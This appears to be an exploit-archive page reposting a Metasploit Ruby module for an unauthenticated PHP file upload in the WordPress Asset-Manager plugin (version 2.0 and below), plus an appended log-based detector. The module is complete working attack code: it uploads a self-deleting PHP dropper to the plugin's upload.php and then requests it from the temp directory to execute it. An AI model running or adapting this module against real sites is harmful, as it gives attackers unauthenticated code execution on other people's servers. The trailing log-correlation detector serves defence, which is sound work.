WordPress Asset-Manager PHP File Upload Vulnerability

Posted on 2012-12-31 09:22:33
This module, from the Metasploit exploit library, covers a vulnerability found in the WordPress Asset-Manager plugin version 2.0 and below. It allows PHP file upload: a user can upload a file to a temp directory without authentication, which results in arbitrary code execution.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'       =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    # PHP dropper that writes and runs the payload, then deletes itself
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Build the multipart/form-data body; upload.php reads the file from the "Filedata" field
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    # Step 1: unauthenticated POST to the plugin's upload handler
    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # Step 2: request the uploaded file from the web-accessible temp directory to run it
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
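As an added example that is not part of the post or of the Metasploit module above: a short Ruby detector that correlates web-server access-log lines to find the two-request pattern the module leaves behind, a POST to the plugin's upload.php answered with 200, followed from the same client by a GET of a .php file under wp-content/uploads/assets/temp/. The log lines are constructed for the example and assume the Apache/nginx combined log format; the 300-second correlation window and the regexes are my own assumptions, not anything the module defines.

```ruby
# Added example, not part of the original post or of the Metasploit module:
# correlate web-server access-log lines to detect the two-request pattern the
# module produces against a vulnerable Asset-Manager install. The log lines
# are constructed for this example and assume the Apache/nginx "combined"
# format; the 300-second correlation window is an arbitrary assumption.
require 'time'

# Endpoint the module POSTs to, and the directory it then fetches from.
UPLOAD_ENDPOINT = %r{/wp-content/plugins/asset-manager/upload\.php}i
TEMP_PHP        = %r{/wp-content/uploads/assets/temp/([^/\s?]+\.php\d*)}i

# Combined log format: client ident user [timestamp] "request" status ...
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3}) /

# Constructed sample log (RFC 5737 documentation addresses). The first client
# performs the upload-then-execute sequence; the second only probes the temp
# directory and gets a 404, so it must not produce a correlated finding.
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [31/Dec/2012:09:20:01 +0800] "GET /wordpress/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
  203.0.113.7 - - [31/Dec/2012:09:20:05 +0800] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 87 "-" "Mozilla/5.0"
  203.0.113.7 - - [31/Dec/2012:09:20:06 +0800] "GET /wordpress/wp-content/uploads/assets/temp/qzbke.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
  198.51.100.4 - - [31/Dec/2012:09:21:10 +0800] "GET /wordpress/wp-content/uploads/assets/temp/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
  198.51.100.4 - - [31/Dec/2012:09:21:12 +0800] "GET /wordpress/wp-content/uploads/assets/temp/shell.php HTTP/1.1" 404 210 "-" "Mozilla/5.0"
LOG

# Parse one combined-format line into a Hash; nil for lines that do not match.
def parse_line(line)
  m = LOG_RE.match(line)
  return nil unless m
  {
    ip:     m[:ip],
    time:   Time.strptime(m[:ts], '%d/%b/%Y:%H:%M:%S %z'),
    method: m[:method],
    path:   m[:path],
    status: m[:status].to_i
  }
end

# Return one finding per GET of a .php file under the temp directory that was
# preceded, from the same client and within `window` seconds, by a POST to
# upload.php that the server answered with 200 (the module's own success check).
def find_upload_then_exec(lines, window: 300)
  events   = lines.map { |l| parse_line(l) }.compact.sort_by { |e| e[:time] }
  uploads  = Hash.new { |h, k| h[k] = [] }   # client ip => successful upload POSTs
  findings = []

  events.each do |e|
    if e[:method] == 'POST' && e[:path] =~ UPLOAD_ENDPOINT && e[:status] == 200
      uploads[e[:ip]] << e
    elsif e[:method] == 'GET' && (m = TEMP_PHP.match(e[:path]))
      recent = uploads[e[:ip]].select { |u| (e[:time] - u[:time]).between?(0, window) }
      next if recent.empty?
      findings << {
        ip:          e[:ip],
        uploaded_at: recent.last[:time],
        file:        m[1],
        path:        e[:path],
        exec_status: e[:status]
      }
    end
  end
  findings
end

if __FILE__ == $0
  find_upload_then_exec(SAMPLE_LOG.lines).each do |f|
    puts "#{f[:ip]} uploaded at #{f[:uploaded_at].iso8601}, then fetched #{f[:file]} (HTTP #{f[:exec_status]})"
  end
end
```

Because the module requests its dropper with `:unlink_self => true`, the uploaded file deletes itself once it has run, so the temp directory can be empty by the time anyone looks; the access log is often the only artifact left. A successful POST to upload.php from a client with no WordPress session is worth alerting on by itself, even without the follow-up GET.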